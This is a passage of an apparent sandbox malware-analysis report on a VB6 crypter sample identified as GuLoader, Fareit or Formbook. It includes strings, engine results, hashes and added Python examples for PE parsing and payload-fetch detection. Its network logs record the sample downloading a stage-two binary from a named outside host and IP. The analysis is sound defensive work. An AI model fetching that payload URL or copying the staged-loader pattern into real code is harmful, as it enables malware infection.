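                      sect_align, file_align, 4, 0, 0, 0, 4, 0,   # alignments, OS/image/subsystem versions
                      0, 0x3000, 0x200, 0, 2, 0,              # Win32Version, SizeOfImage, SizeOfHeaders, CheckSum, GUI, DllChar
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128  # stacks/heaps, 16 empty dirs

    def section_header(name, vaddr, rawptr, raw, chars):
        return struct.pack("<8sIIIIIIHHI", name, len(raw), vaddr, len(raw), rawptr, 0, 0, 0, 0, chars)

    text, data = bytes(range(256)) * 2, b"\0" * 0x200
    headers = (dos + b"PE\0\0" + coff + opt
               + section_header(b".text", 0x1000, 0x200, text, 0x60000020)    # CODE|EXECUTE|READ
               + section_header(b".data", 0x2000, 0x400, data, 0xC0000040))   # INITIALIZED_DATA|READ|WRITE
    image = bytearray(headers.ljust(0x200, b"\0") + text + data)
    # stamp a correct CheckSum so reported == actual, as in the report's table
    struct.pack_into("<I", image, e_lfanew + 24 + 64, pe_checksum(bytes(image)))
    return bytes(image)


if __name__ == "__main__":
    for s in parse_pe(build_sample_pe())["sections"]:
        print(s["name"], s["entropy"], s["packed_code"])
```

Run parse_pe over the real file instead of build_sample_pe to compare against the table: a reported checksum that matches the actual one only says the file was not modified after linking, so the interesting fields are the section entropies and the raw-versus-virtual sizes, where 0x10000 bytes of raw .text against 0xf070 of virtual size and a 6.76 entropy is consistent with a crypter stub carrying an encrypted blob.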

Resources

Name Offset Size Language Sub-language Entropy File type
RT_ICON 0x000123f0 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL 4.04 None
RT_ICON 0x000123f0 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL 4.04 None
RT_ICON 0x000123f0 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL 4.04 None
RT_GROUP_ICON 0x000123c0 0x00000030 LANG_NEUTRAL SUBLANG_NEUTRAL 3.07 None
RT_VERSION 0x00012150 0x00000270 LANG_CATALAN SUBLANG_DEFAULT 3.22 None

Imports

0x401000 None
0x401004 None
0x401008 _CIcos
0x40100c _adj_fptan
0x401010 __vbaVarMove
0x401014 __vbaFreeVar
0x401018 __vbaStrVarMove
0x40101c __vbaFreeVarList
0x401020 _adj_fdiv_m64
0x401024 None
0x401028 __vbaFreeObjList
0x40102c None
0x401030 _adj_fprem1
0x401034 __vbaStrCat
0x401038 None
0x40103c None
0x401044 None
0x401048 _adj_fdiv_m32
0x40104c None
0x401050 None
0x401054 None
0x401058 __vbaObjSet
0x40105c _adj_fdiv_m16i
0x401060 _adj_fdivr_m16i
0x401064 None
0x401068 __vbaFpR8
0x40106c _CIsin
0x401070 __vbaChkstk
0x401074 EVENT_SINK_AddRef
0x401078 None
0x40107c __vbaStrCmp
0x401080 __vbaVarTstEq
0x401084 None
0x401088 None
0x40108c None
0x401090 None
0x401094 __vbaCastObjVar
0x401098 None
0x40109c _adj_fpatan
0x4010a0 None
0x4010a4 EVENT_SINK_Release
0x4010a8 __vbaUI1I2
0x4010ac _CIsqrt
0x4010b4 __vbaExceptHandler
0x4010b8 None
0x4010bc _adj_fprem
0x4010c0 _adj_fdivr_m64
0x4010c4 None
0x4010c8 None
0x4010cc __vbaFPException
0x4010d0 None
0x4010d4 _CIlog
0x4010d8 __vbaNew2
0x4010dc _adj_fdiv_m32i
0x4010e0 _adj_fdivr_m32i
0x4010e4 __vbaStrCopy
0x4010e8 __vbaFreeStrList
0x4010ec None
0x4010f0 _adj_fdivr_m32
0x4010f4 _adj_fdiv_r
0x4010f8 None
0x4010fc None
0x401100 None
0x401104 None
0x401108 __vbaVarDup
0x40110c None
0x401114 _CIatan
0x401118 __vbaStrMove
0x40111c __vbaUI1Str
0x401120 None
0x401124 _allmul
0x401128 None
0x40112c _CItan
0x401130 None
0x401134 None
0x401138 _CIexp
0x40113c __vbaFreeStr
0x401140 __vbaFreeObj

!This program cannot be run in DOS mode.
.text
`.data
.rsrc
MSVBVM60.DLL
Uslebnekrnkel
Paddek
Antip
"Exif
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
O\mSTXZf
hmq{io
oj>ojtq
I%I$~Y
I+N;?
~oje^
Eu3X[
`O:d_
9>V|}
SE[[{
T.dY.
Q[ky6
ui.ty
x~I4[VY
>|WIk
'q$2-
Yl4H.
8~&|O
2[]\/
=RFy<
Kvi7o
H$_5S
sm#mm
Gc}ukoy
Z+}V%m
w7:dPf
:*elu
TeR[H
@eR[O
@ehwPB
*ehuA
&\^jS
@5huD
@eR[H
H2|aQe
@eSXPe
@5kjx
5|ZMe
*ekOl
=hhuE
@eTj9
y.[Zk
q:d?I&
q:d?I&
kkda|
-,jCj
G&'S[S
vljCj
Kj#Q$
~ZQ/S
._6I%
<Egyu&
[=Yn5H
huKth
k?/t?=:
}t7^e
<Qqmk2
y$k$v
3-tS1
i4=SZ
DRKq/
8Ws=~
y.#o>T
x~I?w
_5[sm
kK]>YW~
Coq,s
U~_)~o
x^7I7,
]I4}/P
x]y_:
333333334
%),//,)$
6-*1H
>ABFL
Antip
Check1
preadjectiv
Graciosos4
Option3
Sumnerindsn1
Option2
ATTLEMAR
Option1
Line2
Line1
VB5!6&*
Tanacetonec7
Uslebnekrnkel
Uslebnekrnkel
Uslebnekrnkel
Paddek
GADARE
Allerinder
POTGUTRE
Anthropop9
Gudsf4
LAMPISTERICA
Afblankhundr1
Fejlfindin3
flourlike
Undeceive7
Plump7
s(Cv:O
C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
ATTLEMAR
Graciosos4
Check1
Sumnerindsn1
LYNNEDSLAGENE
kneeing
Bottomlessly
Deathcup
CROSSABILITY
kawaka
VISERENDE
Uanvendeliges
BRUGERANGIVNE
OLDFRUER
facsim
Eftergrelse3
VBA6.DLL
__vbaFpR8
__vbaVarMove
__vbaUI1Str
__vbaVarDup
__vbaFreeObjList
__vbaFreeObj
__vbaStrVarMove
__vbaFreeVarList
__vbaVarTstEq
__vbaFreeStr
__vbaStrCopy
__vbaUI1I2
__vbaCastObjVar
__vbaObjSet
__vbaHresultCheckObj
__vbaNew2
__vbaVarLateMemCallLd
__vbaFreeVar
__vbaFreeStrList
__vbaStrCat
__vbaStrMove
__vbaStrCmp
Kystklima
Volstead5
PHTHIRIUS
Solod
Larvicidal
Foruroligelserne5
UNCONTEMPTIBLY
INSTRUKTIONSKURSUS
Vngerne
Tilhrendes4
Dveskolens8
Servicefunktioners5
EKSEKUTION
Diktere1
CHEFDOM
Lornness7
RANVEIG
Forpligtelseserklrings
metea
Irradiate5
Amuck7
BRANIFF
Bestvlede6
reaccelerated
Oinks
surstyle
sammenstds
refractional
TOTALERS
brdstudiers
Merling8
SATANIZE
DONNER
Driftsikkert6
Plastiskes9
VENSTRELINEAER
Skovhugsterne1
Heautomorphism1
Whoreishly
Bryggerkedels9
tH9=
tj9=
ty9=
@tp9=
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaVarMove
__vbaFreeVar
__vbaStrVarMove
__vbaFreeVarList
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaObjSet
_adj_fdiv_m16i
_adj_fdivr_m16i
__vbaFpR8
_CIsin
__vbaChkstk
EVENT_SINK_AddRef
__vbaStrCmp
__vbaVarTstEq
__vbaCastObjVar
_adj_fpatan
EVENT_SINK_Release
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaExceptHandler
_adj_fprem
_adj_fdivr_m64
__vbaFPException
_CIlog
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaFreeStrList
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarDup
__vbaVarLateMemCallLd
_CIatan
__vbaStrMove
__vbaUI1Str
_allmul
_CItan
_CIexp
__vbaFreeStr
__vbaFreeObj
%),//,)$
6-*1H
>ABFL
333333334
/ P6pL
L3kOpEkLYZppyTY9i0RZwqFI8r197
Spiralsnoet6
somatological
annelides
Jurata
Sejrvindings
Upshoot3
KOMMUNALBESTYRELSE
aflvningerne
CONTAINMENT
CANCANENS
KATJES
medicean
FLERRIED
OLIGIST
Fodterapeuters
startbogstavs
Caponized9
Blokfljternes
TALVRDIEN
harpist
:20:2
Tuberculomas
Coatninger
Polydaemonist5
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
040304B0
LegalCopyright
Internal
LegalTrademarks
Internal
ProductName
Uslebnekrnkel
FileVersion
ProductVersion
InternalName
Tanacetonec7
OriginalFilename
Tanacetonec7.exe
/ P6pL

Full Results

Engine: Signature | Engine: Signature | Engine: Signature
Bkav: Clean | MicroWorld-eScan: Clean | CMC: Clean
CAT-QuickHeal: Clean | ALYac: Clean | Cylance: Unsafe
VIPRE: Clean | SUPERAntiSpyware: Clean | Sangfor: Malware
K7AntiVirus: Clean | Alibaba: Clean | K7GW: Clean
Cybereason: Clean | Arcabit: Clean | Invincea: Clean
Baidu: Clean | F-Prot: W32/VBKrypt.AMM.gen!Eldorado | Symantec: ML.Attribute.HighConfidence
TotalDefense: Clean | APEX: Malicious | Avast: Clean
ClamAV: Clean | Kaspersky: Trojan.Win32.Vebzenpak.vsy | BitDefender: Clean
NANO-Antivirus: Clean | Paloalto: Clean | ViRobot: Clean
Tencent: Clean | Ad-Aware: Clean | Sophos: Clean
Comodo: Clean | F-Secure: Clean | DrWeb: Clean
Zillya: Clean | TrendMicro: Clean | McAfee-GW-Edition: Clean
Trapmine: malicious.high.ml.score | FireEye: Clean | Emsisoft: Clean
SentinelOne: DFI - Suspicious PE | Cyren: W32/VBKrypt.AMM.gen!Eldorado | Jiangmin: Clean
Webroot: Clean | Avira: Clean | Fortinet: W32/Agent.HKMB!tr
Antiy-AVL: Clean | Kingsoft: Clean | Endgame: malicious (high confidence)
Microsoft: PWS:Win32/Fareit.AB!MTB | AegisLab: Clean | ZoneAlarm: Trojan.Win32.Vebzenpak.vsy
Avast-Mobile: Clean | TACHYON: Clean | AhnLab-V3: Clean
Acronis: Clean | McAfee: Fareit-FST!5484FDF0FB3F | MAX: Clean
VBA32: Clean | Malwarebytes: Trojan.MalPack.VB | Zoner: Clean
ESET-NOD32: a variant of Win32/Injector.EMGX | TrendMicro-HouseCall: Clean | Rising: Downloader.Guloader!1.C738 (CLASSIC)
Yandex: Clean | Ikarus: Win32.SuspectCrc | eGambit: Unsafe.AI_Score_99%
GData: Clean | BitDefenderTheta: Gen:[email protected] | AVG: Clean
Panda: Clean | CrowdStrike: Clean | Qihoo-360: Generic/HEUR/QVM03.0.B1EC.Malware.Gen
Sorry! No behavior.

Hosts

Direct | IP | Country Name
N | 185.159.153.117 | Iran, Islamic Republic of
Y | 1.1.1.1 | Australia

TCP

Source Source Port Destination Destination Port
192.168.1.2 49195 185.159.153.117 pars-science.ir 80
192.168.1.2 49196 185.159.153.117 pars-science.ir 80
192.168.1.2 49197 185.159.153.117 pars-science.ir 80
192.168.1.2 49198 185.159.153.117 pars-science.ir 80

UDP

Source Source Port Destination Destination Port
192.168.1.2 60934 1.1.1.1 53
192.168.1.2 61170 1.1.1.1 53
192.168.1.2 64006 1.1.1.1 53
192.168.1.2 137 192.168.1.255 137
192.168.1.2 137 192.168.1.3 137

DNS

Name | Response | Post-Analysis Lookup
pars-science.ir | A 185.159.153.117 | 185.159.153.117

HTTP Requests

URI Data
http://pars-science.ir/colinx_hYnafiCIIe228.bin
GET /colinx_hYnafiCIIe228.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: pars-science.ir
Cache-Control: no-cache

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

Timestamp | Source IP | Source Port | Destination IP | Destination Port | Protocol | GID | SID | REV | Signature | Category | Severity
2020-06-05 14:00:27.226 | 192.168.1.2 | 49183 | 13.107.42.23 | 443 | TCP | 1 | 2028397 | 2 | ET JA3 Hash - Possible Malware - Various Malspam/RigEK | Unknown Traffic | 3

Suricata TLS

Timestamp Source IP Source Port Destination IP Destination Port Subject Issuer Fingerprint Version
2020-06-05 14:00:27.226 192.168.1.2 [VT] 49183 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2

Suricata HTTP

Timestamp | Source IP | Source Port | Destination IP | Destination Port | Method | Status | Hostname | URI | Content Type | User Agent | Referrer | Length
2020-06-05 14:01:03.173 | 192.168.1.2 | 49195 | 185.159.153.117 | 80 | | None | pars-science.ir | /colinx_hYnafiCIIe228.bin | None | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | None | 0
2020-06-05 14:01:11.252 | 192.168.1.2 | 49196 | 185.159.153.117 | 80 | | None | pars-science.ir | /colinx_hYnafiCIIe228.bin | None | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | None | 0
2020-06-05 14:01:19.985 | 192.168.1.2 | 49197 | 185.159.153.117 | 80 | | None | pars-science.ir | /colinx_hYnafiCIIe228.bin | None | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | None | 0
2020-06-05 14:01:31.201 | 192.168.1.2 | 49198 | 185.159.153.117 | 80 | | 200 | pars-science.ir | /colinx_hYnafiCIIe228.bin | application/octet-stream | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | None | 183360
Sorry! No dropped Suricata Extracted files.
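
The HTTP Requests section and the Suricata HTTP table above together show the stage-two fetch pattern of a staged loader: three requests for the same /colinx_hYnafiCIIe228.bin URI with no recorded status, then a fourth answered with 200, application/octet-stream and a 183360-byte body, all sent with an Internet Explorer 11 User-Agent from a process that is a VB6 executable. The Python below is an added example, not a CAPE signature or a Suricata rule: it turns that pattern into detection logic and runs it over the table's four rows (transcribed here as pipe-separated lines) plus one constructed benign request for contrast. The 50,000-byte minimum body size, the extension list and the two-signal scoring are the example's own assumptions.

```python
"""Added example, not part of the CAPE report: detection logic run over the rows
of the report's Suricata HTTP table. The four pars-science.ir rows are transcribed
from the page; the www.example.com row is a constructed benign control. The scoring
is this example's own heuristic, not a Suricata rule or CAPE signature."""
from collections import defaultdict

# Column order of the report's Suricata HTTP table
FIELDS = ("timestamp", "src_ip", "src_port", "dst_ip", "dst_port", "method",
          "status", "hostname", "uri", "content_type", "user_agent",
          "referrer", "length")
PAYLOAD_EXTENSIONS = (".bin", ".dat", ".exe", ".dll")   # assumption: stage-two naming
BINARY_TYPES = {"application/octet-stream", "application/x-msdownload"}
MIN_PAYLOAD_BYTES = 50_000    # assumption: smaller bodies are beacons, not stages

IE11_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
SAMPLE_ROWS = [
    # constructed benign control: RFC 5737 address, reserved example host
    f"2020-06-05 14:00:10.000 | 192.168.1.2 | 49180 | 203.0.113.10 | 80 | GET | 200 | www.example.com | /index.html | text/html | {IE11_UA} | None | 1256",
    # the report's four rows (method column empty on the page)
    f"2020-06-05 14:01:03.173 | 192.168.1.2 | 49195 | 185.159.153.117 | 80 | | None | pars-science.ir | /colinx_hYnafiCIIe228.bin | None | {IE11_UA} | None | 0",
    f"2020-06-05 14:01:11.252 | 192.168.1.2 | 49196 | 185.159.153.117 | 80 | | None | pars-science.ir | /colinx_hYnafiCIIe228.bin | None | {IE11_UA} | None | 0",
    f"2020-06-05 14:01:19.985 | 192.168.1.2 | 49197 | 185.159.153.117 | 80 | | None | pars-science.ir | /colinx_hYnafiCIIe228.bin | None | {IE11_UA} | None | 0",
    f"2020-06-05 14:01:31.201 | 192.168.1.2 | 49198 | 185.159.153.117 | 80 | | 200 | pars-science.ir | /colinx_hYnafiCIIe228.bin | application/octet-stream | {IE11_UA} | None | 183360",
]


def parse_row(line: str) -> dict:
    """One pipe-separated row in FIELDS order; 'None' and blank cells become None."""
    parts = [p.strip() for p in line.split("|")]
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} columns, got {len(parts)}")
    row = {k: (None if v in ("", "None") else v) for k, v in zip(FIELDS, parts)}
    row["length"] = int(row["length"] or 0)
    return row


def flag_payload_fetches(rows: list) -> list:
    """Group requests per (host, uri) and flag download loops that end in a
    binary body: the retry-until-200 pattern of a staged loader."""
    by_target = defaultdict(list)
    for r in rows:
        by_target[(r["hostname"], r["uri"])].append(r)
    findings = []
    for (host, uri), reqs in by_target.items():
        reqs.sort(key=lambda r: r["timestamp"])
        final = reqs[-1]
        unanswered = sum(1 for r in reqs if r["status"] is None)
        retry_loop = unanswered > 0 and final["status"] == "200"
        binary_body = (final["content_type"] in BINARY_TYPES
                       and final["length"] >= MIN_PAYLOAD_BYTES)
        reasons = []
        if retry_loop:
            reasons.append(f"{unanswered} unanswered attempts before HTTP 200")
        if binary_body:
            reasons.append(f"{final['content_type']} body of {final['length']} bytes")
        if uri.lower().endswith(PAYLOAD_EXTENSIONS):
            reasons.append(f"payload-style URI extension .{uri.rsplit('.', 1)[-1]}")
        if final["dst_port"] == "80":
            reasons.append("cleartext HTTP")
        # require a behavioural signal (loop or binary body) plus one corroborating one
        if (retry_loop or binary_body) and len(reasons) >= 2:
            findings.append({
                "host": host, "uri": uri, "dst_ip": final["dst_ip"],
                "attempts": len(reqs), "unanswered": unanswered,
                "length": final["length"], "user_agent": final["user_agent"],
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in flag_payload_fetches([parse_row(r) for r in SAMPLE_ROWS]):
        print(f"{f['host']}{f['uri']} ({f['dst_ip']}): {'; '.join(f['reasons'])}")
```

The retry count on its own is not a signal (software updaters also retry on cleartext HTTP), which is why the scoring needs either the unanswered-then-200 loop or a large binary body before the extension and port contribute. The User-Agent is carried in the finding for pivoting rather than scored: a browser string from a non-browser process is only visible once you join the flow to the process that opened it, which the sandbox has but the HTTP log alone does not.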

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
192.168.1.2 49183 13.107.42.23 443 3b483d0b34894548b602e8d18cdc24c5 unknown
Sorry! No dropped files.
Sorry! No CAPE files.
Process Name c6Dqqn8fjGAx.exe
PID 5848
Dump Size 182784 bytes
Module Path C:\Users\Rebecca\AppData\Local\Temp\c6Dqqn8fjGAx.exe
Type PE image: 32-bit executable
PE timestamp 2014-02-06 00:19:06
MD5 fa2910caca0aad77640eefc700c1c1bf
SHA1 518f430145b9f5ee728f882f6ab04c546d5e8629
SHA256 21b58278848b50881a20a01a8a807a5adc3708b1225ed05267ef6bcace25d4bf
CRC32 F6C4D501
Ssdeep 3072:y8X8KOYTUts7Ek7+4kETDufRzSJn8+Mxo8jDyt7MyNJhPoz6wtWxwSD1MYa:ypc5EE+pyozSJn8+KoSDyWOhPonSDaT
Yara
  • shellcode_get_eip - Match x86 that appears to fetch $PC. - Author: William Ballenthin
  • shellcode_stack_strings - Match x86 that appears to be stack string creation. - Author: William Ballenthin
CAPE Yara
  • Formbook Payload - Author: Felix Bilstein - yara-signator at cocacoding dot com
Dump Filename 21b58278848b50881a20a01a8a807a5adc3708b1225ed05267ef6bcace25d4bf

BinGraph

Defense Evasion Privilege Escalation
  • T1116 - Code Signing
    • Signature - invalid_authenticode_signature
  • T1055 - Process Injection
    • Signature - InjectionInterProcess

    Processing ( 8.554 seconds )

    • 5.237 Suricata
    • 2.177 NetworkAnalysis
    • 0.513 CAPE
    • 0.189 VirusTotal
    • 0.182 BehaviorAnalysis
    • 0.162 Static
    • 0.03 Deduplicate
    • 0.019 AnalysisInfo
    • 0.018 ProcDump
    • 0.011 TargetInfo
    • 0.006 Debug
    • 0.004 Dropped
    • 0.004 peid
    • 0.002 Strings

    Signatures ( 0.216 seconds )

    • 0.046 antiav_detectreg
    • 0.017 infostealer_ftp
    • 0.016 territorial_disputes_sigs
    • 0.012 ransomware_files
    • 0.01 infostealer_im
    • 0.009 antianalysis_detectreg
    • 0.007 ransomware_extensions
    • 0.006 antiav_detectfile
    • 0.005 antidbg_windows
    • 0.005 persistence_autorun
    • 0.005 antivm_vbox_keys
    • 0.005 modify_proxy
    • 0.004 api_spamming
    • 0.004 decoy_document
    • 0.004 antianalysis_detectfile
    • 0.004 infostealer_bitcoin
    • 0.004 infostealer_mail
    • 0.003 NewtWire Behavior
    • 0.003 antivm_vmware_keys
    • 0.003 masquerade_process_name
    • 0.002 antivm_generic_disk
    • 0.002 kibex_behavior
    • 0.002 antivm_parallels_keys
    • 0.002 antivm_vbox_files
    • 0.002 antivm_xen_keys
    • 0.002 geodo_banking_trojan
    • 0.002 browser_security
    • 0.002 disables_browser_warn
    • 0.002 network_torgateway
    • 0.001 Doppelganging
    • 0.001 InjectionCreateRemoteThread
    • 0.001 antiemu_wine_func
    • 0.001 antivm_generic_scsi
    • 0.001 antivm_vbox_libs
    • 0.001 betabot_behavior
    • 0.001 bootkit
    • 0.001 dynamic_function_loading
    • 0.001 exec_crash
    • 0.001 injection_createremotethread
    • 0.001 malicious_dynamic_function_loading
    • 0.001 mimics_filetime
    • 0.001 reads_self
    • 0.001 stealth_file
    • 0.001 stealth_timeout
    • 0.001 tinba_behavior
    • 0.001 virus
    • 0.001 antidbg_devices
    • 0.001 antivm_generic_diskreg
    • 0.001 antivm_vpc_keys
    • 0.001 ketrican_regkeys
    • 0.001 network_cnc_http
    • 0.001 network_dns_opennic
    • 0.001 revil_mutexes
    • 0.001 limerat_regkeys
    • 0.001 recon_fingerprint

    Reporting ( 7.823 seconds )

    • 7.76 BinGraph
    • 0.049 MITRE_TTPS
    • 0.014 PCAP2CERT